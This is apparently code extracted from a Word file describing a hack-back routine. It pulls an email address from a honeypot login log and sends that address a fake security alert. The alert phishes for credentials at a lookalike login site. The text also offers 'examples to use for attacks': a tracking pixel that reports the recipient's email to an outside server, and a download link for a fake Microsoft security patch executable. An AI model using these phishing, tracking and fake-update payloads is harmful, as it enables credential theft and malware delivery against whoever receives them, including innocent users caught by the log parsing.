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#Execution flow</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">:# Step 1: Detect &amp; Extract Email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attacker_email = extract_attacker_email()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Step 2: Deploy AI Countermeasures Based on Attack Progression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aggressive_defense("medium")  # Start at medium, escalate if necessary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Step 3: If We Captured an Email, Send a Fake Alert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send_fake_alert(attacker_email)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">#examples to use for attacks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&lt;img src="http://attacker-tracking-server.com/track?email=ATTACKER_EMAIL"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&lt;a href="http://microsoft-update-patch.com/security_patch.exe"&gt;Download Windows Security Patch&lt;/a&gt;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import smtplib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email.mime.text import MIMEText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SMTP_SERVER = "smtp.example.com"  # Fake mail server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SENDER_EMAIL = "security-alerts@example.com"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ATTACKER_EMAIL = "attacker@example.com"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send_fake_alert():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"""Sends a deception-based phishing alert email to attacker."""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msg = MIMEText("ALERT: Your login activity triggered an automated security response. \n\nTo review security details, verify your credentials at: http://fake-secure-login.com")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msg["Subject"] = "Security Alert: Unusual Login Activity Detected"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msg["From"] = SENDER_EMAIL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msg["To"] = ATTACKER_EMAIL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with smtplib.SMTP(SMTP_SERVER) as server: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server.sendmail(SENDER_EMAIL, ATTACKER_EMAIL, msg.as_string())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print("📧 Fake security alert email sent to attacker.")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send_fake_alert()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LOG_FILE = "/var/log/honeypot_logins.log"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extract_attacker_email():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"""Extracts an attacker’s email from logged login attempts."""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with open(LOG_FILE, "r") as log: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line in log.readlines():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match = re.search(r"[\w\.-]+@[\w\.-]+\.\w+", line)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if match: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print(f"📩 Attacker Email Captured: {match.group(0)}")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return match.group(0)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attacker_email = extract_attacker_email()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smtplib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email.mime.text import MIMEText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SMTP_SERVER = "smtp.example.com"  # Replace with your SMTP server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SENDER_EMAIL = "security-alerts@example.com"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send_fake_alert(attacker_email):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"""Sends a deception-based phishing alert to the attacker."""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not attacker_email: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print("⚠️ No attacker email detected. Skipping phishing response.")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msg = MIMEText(f"""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ALERT: Your login activity triggered an automated security response.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To review security details, verify your credentials at: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http://fake-secure-login.com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Failure to verify within 24 hours will result in security action.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msg["Subject"] = "Security Alert: Unusual Login Activity Detected"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msg["From"] = SENDER_EMAIL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msg["To"] = attacker_email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with smtplib.SMTP(SMTP_SERVER) as server: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server.sendmail(SENDER_EMAIL, attacker_email, msg.as_string())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print(f"📧 Fake security alert sent to: {attacker_email}")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attacker_email = extract_attacker_email()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send_fake_alert(attacker_email)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